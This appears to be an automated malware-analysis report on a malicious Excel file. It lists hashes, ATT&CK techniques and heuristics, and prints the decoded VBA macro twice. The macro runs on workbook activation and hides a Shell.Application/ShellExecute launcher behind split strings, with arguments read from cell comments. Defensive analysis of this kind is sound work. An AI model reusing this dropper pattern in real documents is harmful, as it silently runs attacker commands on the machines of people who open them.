Office (OLE) malware analysis — malicious · f57662fba9ef54de

MALICIOUS

Office (OLE)

118.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-06-28

MD5: e1a60d7c0d500b1926d24603e9fae4c5 SHA-1: a9b444a31cf1eedec6688445de3e75b19312723e SHA-256: f57662fba9ef54debc12e29ac01ce4e1b4d1e257e49cb89158e61e907b77dddb

100 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros. The macros utilize CreateObject to instantiate a Shell object and then call ShellExecute with parameters that appear to be designed to download and execute a second-stage payload. The obfuscated function calls and string concatenations suggest an attempt to evade detection. The primary technique observed is the use of Visual Basic for Application (VBA) to interpret and execute commands.

Heuristics 3

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set aDqp = CreateObject(dfjkdsf() + klsdk() + wlfff())
aDqp.ShellExecute "P" + n1, A2, "", "", 0

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1759 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1759 bytes
SHA-256: `fb60d4704982165e0824a99ad9180d4e6efad25a429fac06b8ea0e57ab22a4e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() Dim eone, cmUrV, mpQmge With ThisWorkbook eone = .ActiveSheet.Range("D500").Comment.Text eone2 = .ActiveSheet.Range("E500").Comment.Text mpQmge = UcWqx.jOQHb(eone, eone2) End With End Sub Function cpZDQUD(Text) Dim i As Integer Dim CqVKXD As String Dim qdeahqaR As String qdeahqaR = Trim(Text) For i = 1 To Len(qdeahqaR) CqVKXD = Mid(qdeahqaR, i, 1) & CqVKXD Next i cpZDQUD = CqVKXD End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "UcWqx" Attribute VB_Base = "0{94D443CF-D674-4995-96C3-1B11A8856206}{26A8CD68-D36A-4DD7-B1F9-FFE8AE3CEE0C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function jOQHb(A2, n1) Dim aDqp Set aDqp = CreateObject(dfjkdsf() + klsdk() + wlfff()) aDqp.ShellExecute "P" + n1, A2, "", "", 0 End Function Function dfjkdsf() dfjkdsf = "Shel" End Function Function klsdk() klsdk = "l.Appli" End Function Function wlfff() wlfff = "cation" End Function

SHA-256: fb60d4704982165e0824a99ad9180d4e6efad25a429fac06b8ea0e57ab22a4e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim eone, cmUrV, mpQmge

With ThisWorkbook
  eone = .ActiveSheet.Range("D500").Comment.Text
  eone2 = .ActiveSheet.Range("E500").Comment.Text

  mpQmge = UcWqx.jOQHb(eone, eone2)
  End With
End Sub


Function cpZDQUD(Text)
    Dim i As Integer
    Dim CqVKXD As String
    Dim qdeahqaR As String
    qdeahqaR = Trim(Text)
    For i = 1 To Len(qdeahqaR)
      CqVKXD = Mid(qdeahqaR, i, 1) & CqVKXD
    Next i
    cpZDQUD = CqVKXD
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UcWqx"
Attribute VB_Base = "0{94D443CF-D674-4995-96C3-1B11A8856206}{26A8CD68-D36A-4DD7-B1F9-FFE8AE3CEE0C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function jOQHb(A2, n1)
Dim aDqp

Set aDqp = CreateObject(dfjkdsf() + klsdk() + wlfff())
aDqp.ShellExecute "P" + n1, A2, "", "", 0



End Function

Function dfjkdsf()
dfjkdsf = "Shel"
End Function

Function klsdk()
klsdk = "l.Appli"
End Function

Function wlfff()
wlfff = "cation"
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.